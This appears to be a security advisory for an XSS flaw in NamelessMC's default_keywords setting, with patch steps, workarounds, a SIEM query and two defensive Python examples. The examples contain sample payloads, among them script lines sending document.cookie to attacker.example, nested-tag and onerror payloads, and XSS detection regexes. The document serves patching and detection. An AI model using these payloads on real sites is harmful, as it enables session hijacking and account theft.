CVE-2025-54421
📋 TL;DR
This cross-site scripting (XSS) vulnerability in NamelessMC allows authenticated attackers to inject malicious scripts into web pages via the default_keywords parameter. Attackers can steal session cookies, redirect users to malicious sites, or perform actions on behalf of users. Only NamelessMC instances running versions before 2.2.4 are affected.
💻 Affected Systems
- NamelessMC
📦 What is this software?
Nameless by Namelessmc
⚠️ Risk & Real-World Impact
Worst Case
An attacker could steal administrator session cookies, gain full administrative access to the NamelessMC instance, and potentially compromise the underlying server or Minecraft server integration.
Likely Case
Attackers steal user session cookies to hijack accounts, deface pages, or redirect users to phishing/malware sites.
If Mitigated
With a strict Content Security Policy that blocks inline scripts, or with the parameter HTML-encoded before it is rendered, an injected payload would be stored but would not execute in victims' browsers. The underlying bug would still exist until the code is patched, so these measures reduce impact rather than remove the vulnerability.
🎯 Exploit Status
XSS vulnerabilities are commonly weaponized. The advisory shows the exact vulnerable code, making exploitation straightforward for attackers with authenticated access.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 2.2.4
Vendor Advisory: https://github.com/NamelessMC/Nameless/security/advisories/GHSA-f5rm-w4mx-q7rx
Restart Required: No
Instructions:
1. Back up your current NamelessMC installation and database.
2. Download NamelessMC version 2.2.4 from the official repository.
3. Replace all files with the new version, preserving your configuration files.
4. Clear any caching mechanisms.
5. Verify the update completed successfully.
🔧 Temporary Workarounds
Input Validation Filter
Add server-side validation for the default_keywords parameter before it is stored: reject values containing HTML markup (or restrict them to an allowlist of keyword characters) and HTML-encode the value wherever it is rendered into a page. Note that simply stripping <script> tags is easy to bypass (nested tags, event-handler attributes on other elements) and is not a substitute for output encoding.
Content Security Policy
Send a strict Content-Security-Policy header (no 'unsafe-inline' in script-src, scripts only from your own origin or nonce-tagged) so that an injected inline script is blocked by the browser even if the payload reaches the page.
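The two workarounds above differ in strength, and the following is an added illustration of why; it is written in Python for clarity and is not NamelessMC's own (PHP) code. The sample values are constructed for this example, not taken from the advisory. It shows that a single-pass "remove <script> tags" filter is bypassed by a nested tag and does nothing against an event-handler attribute, while an allowlist validator rejects both and HTML attribute encoding renders any payload inert:

```python
import html
import re
from typing import List, Optional

# Constructed sample values for the default_keywords setting (not from the advisory):
# one benign value and three payloads that a naive tag-stripping filter handles badly.
SAMPLES = {
    "benign": "minecraft, survival, skyblock",
    "script": "mc<script>document.location='https://attacker.example/?c='+document.cookie</script>",
    "nested": "mc<scr<script>ipt>alert(1)</scr</script>ipt>",
    "event_handler": 'mc<img src=x onerror="alert(1)">',
}

SCRIPT_TAG = re.compile(r"</?script[^>]*>", re.IGNORECASE)


def strip_script_tags(value: str) -> str:
    """The weak workaround: one pass that deletes <script> and </script> tags.

    Removing the inner tags of "<scr<script>ipt>" leaves "<script>" behind, and
    an <img onerror=...> payload is untouched because it contains no script tag.
    """
    return SCRIPT_TAG.sub("", value)


# Allowlist for a single keyword: letters, digits, space, underscore, hyphen.
KEYWORD = re.compile(r"[A-Za-z0-9 _\-]{1,64}")


def validate_keywords(value: str, max_keywords: int = 20) -> Optional[List[str]]:
    """Allowlist validation: return the normalised keyword list, or None to reject.

    Anything that is not a comma-separated list of plain keywords is refused
    outright, so markup never reaches storage.
    """
    parts = [p.strip() for p in value.split(",")]
    if not parts or len(parts) > max_keywords:
        return None
    if any(KEYWORD.fullmatch(p) is None for p in parts):
        return None
    return parts


def encode_for_html_attr(value: str) -> str:
    """Output encoding: escape &, <, >, " and ' so the value cannot break out
    of an attribute or start a tag, regardless of what was stored."""
    return html.escape(value, quote=True)


def render_meta_keywords(value: str) -> str:
    """Render the setting the way a template should: encoded at output time."""
    return '<meta name="keywords" content="%s">' % encode_for_html_attr(value)


if __name__ == "__main__":
    for name, value in SAMPLES.items():
        print(f"{name:14} stripped -> {strip_script_tags(value)}")
        print(f"{'':14} validated -> {validate_keywords(value)}")
        print(f"{'':14} rendered -> {render_meta_keywords(value)}")
```

Run as-is to see the three treatments side by side: the nested payload survives tag stripping as a working `<script>` element, the allowlist rejects every payload while accepting the benign list, and the encoded output contains no raw `<` at all.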
🧯 If You Can't Patch
- Restrict access to the vulnerable functionality to trusted administrators only.
- Implement a web application firewall (WAF) with XSS protection rules.
🔍 How to Verify
Check if Vulnerable:
Check if your NamelessMC version is below 2.2.4 by viewing the version in the admin panel or checking the core/init.php file.
Check Version:
Check the 'nameless_version' variable in core/init.php or view the version in the admin dashboard.
Verify Fix Applied:
After updating to 2.2.4, verify the version shows 2.2.4 in the admin panel and test that script injection in default_keywords no longer executes.
📡 Detection & Monitoring
Log Indicators:
- POST requests to the settings page whose default_keywords parameter contains script tags, javascript: URIs or event-handler attributes (visible only if request bodies are logged at the WAF or application layer)
- Multiple failed login attempts followed by a successful authentication and then changes to site settings
Network Indicators:
- HTTP requests with suspicious script payloads in default_keywords parameter
SIEM Query:
web.url:*default_keywords* AND (web.url:*<script* OR web.url:*%3Cscript* OR web.url:*javascript:* OR web.url:*onerror=*)
Note: this query only matches payloads carried in the URL query string. A payload submitted in a POST body will not appear in web.url, so pair it with request-body logging or WAF alerts on the admin settings endpoint.
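As an added example (not part of the original advisory), here is the detection logic above applied to a few constructed access-log lines in combined log format. It decodes the default_keywords query parameter (twice, so a double-encoded payload is still caught), matches the same indicator classes as the SIEM query, and flags POST requests to the admin panel for follow-up because an access log does not contain the body. The log lines, IP addresses and the /panel/ path prefix are assumptions for the example, not real NamelessMC logs:

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines (combined log format). None are real NamelessMC
# logs; the /panel/ prefix for the admin settings page is an assumption.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Aug/2025:12:00:01 +0000] "GET /panel/core/general?default_keywords=minecraft%2Csurvival HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Aug/2025:12:00:07 +0000] "GET /panel/core/general?default_keywords=%3Cscript%3Efetch%28%27https%3A%2F%2Fattacker.example%2F%3Fc%3D%27%2Bdocument.cookie%29%3C%2Fscript%3E HTTP/1.1" 200 512 "-" "curl/8.0"
203.0.113.9 - - [10/Aug/2025:12:00:09 +0000] "GET /panel/core/general?default_keywords=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E HTTP/1.1" 200 512 "-" "curl/8.0"
203.0.113.9 - - [10/Aug/2025:12:00:15 +0000] "POST /panel/core/general HTTP/1.1" 302 0 "-" "curl/8.0"
198.51.100.2 - - [10/Aug/2025:12:01:00 +0000] "GET /forum HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
"""

# Minimal combined-log-format parser: client IP, timestamp, method, target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicator classes, in the order they are reported.
XSS_PATTERNS = [
    ("script_tag", re.compile(r"<\s*script", re.IGNORECASE)),
    ("javascript_uri", re.compile(r"javascript\s*:", re.IGNORECASE)),
    ("event_handler", re.compile(r"\bon[a-z]+\s*=", re.IGNORECASE)),
    ("html_tag", re.compile(r"<\s*(img|svg|iframe|object|embed)\b", re.IGNORECASE)),
]


def parse_line(line: str):
    """Return the parsed fields of one log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def xss_indicators(target: str, param: str = "default_keywords"):
    """Names of the XSS indicator classes found in the given query parameter.

    parse_qs performs one round of percent-decoding; unquote() adds a second so
    a double-encoded payload (%253Cscript) is still inspected in clear.
    """
    query = urlsplit(target).query
    hits = []
    for value in parse_qs(query, keep_blank_values=True).get(param, []):
        candidate = unquote(value)
        for name, pattern in XSS_PATTERNS:
            if pattern.search(candidate) and name not in hits:
                hits.append(name)
    return hits


def scan(log_text: str, panel_prefix: str = "/panel/"):
    """Scan access-log text and return a list of alert dicts.

    severity "high": a recognised XSS payload in default_keywords (URL-borne).
    severity "review": a POST to the admin panel; the body is not in the access
    log, so the request must be inspected at the WAF or application layer.
    """
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = xss_indicators(rec["target"])
        if hits:
            alerts.append({
                "ip": rec["ip"], "ts": rec["ts"], "severity": "high",
                "reason": "XSS payload in default_keywords: " + ", ".join(hits),
            })
        elif rec["method"] == "POST" and rec["target"].startswith(panel_prefix):
            alerts.append({
                "ip": rec["ip"], "ts": rec["ts"], "severity": "review",
                "reason": "POST to admin panel; body not logged, inspect at WAF/app layer",
            })
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(f'{alert["ts"]} {alert["ip"]:14} {alert["severity"]:6} {alert["reason"]}')
```

On the sample above, the benign GET and the unrelated /forum request produce nothing, the two payload-bearing GETs are reported as high with their indicator classes, and the POST to the panel is surfaced for review; that last case is exactly what the URL-only SIEM query misses.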